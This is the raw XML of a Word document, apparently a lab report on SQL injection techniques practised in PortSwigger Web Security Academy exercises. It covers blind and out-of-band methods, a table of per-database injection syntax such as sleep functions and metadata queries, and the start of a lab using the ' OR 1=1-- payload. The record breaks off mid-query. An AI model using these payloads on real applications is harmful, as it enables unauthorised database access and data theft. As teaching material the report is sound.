          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Time-Based Inference:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploiting synchronous database calls to pause execution when a targeted condition is true. Because time delay is an absolute metric measured via network response latency, it functions regardless of how thoroughly the application sanitizes its visible HTML output. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>C. Out-of-Band (OAST) SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When both in-band and blind channels are constrained by network timeouts or asynchronous execution, attackers force the database engine to generate external network requests (such as DNS lookups or HTTP requests via </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UTL_HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Oracle or </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in MSSQL) to an external server under the attacker's control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Database Engine Dialect &amp; Architectural Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploitation during a penetration test requires adapting the injected syntax to match the specific RDBMS hosting the application. The following comparative matrix details the variations observed across the lab environments:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1705"/>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="1725"/>
        <w:gridCol w:w="1938"/>
        <w:gridCol w:w="1938"/>
      </w:tblGrid>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rStyle w:val="Strong"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Feature / Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Oracle Database PNG+ 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Microsoft SQL Server (MSSQL) PNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1938" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MySQL Database PNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1938" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PostgreSQL Database PNG</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Comment Terminator</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or </w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">-- </w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(space required)</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String Concatenation</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(double pipe) </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(plus operator)</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CONCAT(a, b)</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(double pipe) </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Mandatory FROM Clause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes (must use </w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>FROM dual</w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1938" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1938" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</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lastRenderedPageBreak/>
              <w:t>Active Version Extraction</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SELECT banner FROM v$version</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SELECT @@version</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SELECT @@version</w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>version()</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SELECT version()</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System Metadata Tables</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all_tables</w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>all_tab_columns</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information_schema.tables</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information_schema.tables</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information_schema.tables</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Time-Delay Injection</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dbms_pipe.receive_message()</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WAITFOR DELAY '0:0:10'</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SLEEP(10)</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pg_sleep(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidTr="00817D5D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Batch Query Separation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710"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(semi-colon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725"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(semi-colon)</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(semi-colon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1938" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00817D5D">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (semi-colon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Methodological Progression: Laboratory Case Studies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The following subsections document the end-to-end technical exploitation workflows executed across the PortSwigger Web Security Academy practical assignments.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UNION INJECTION TESTING FLOWCHART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[Target Input]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[Determine Column Count]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UNION SELECT NULL, NULL...</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v</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[Detect Text-Compatible Slots]</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         UNION SELECT 'a', NULL, NULL...</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v</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[Enumerate Database Schemas]</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Query information_schema or Oracle</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v</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[Exfiltrate Targeted Data Rows]</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Concatenate multi-column entries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.1 Apprentice Practical Work: Tautologies &amp; Comment Injections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 1: WHERE Clause Vulnerability — Unreleased Product Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable Endpoint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Product Category Filter (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET /filter?category=Gifts</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Query Context:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-58"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> products </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'Gifts'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> released </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Injection Mechanics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application failed to sanitize the </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>category</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET parameter. Injecting </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>' OR 1=1--</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rewrote the query logic: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-59"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> products </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'Gifts'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
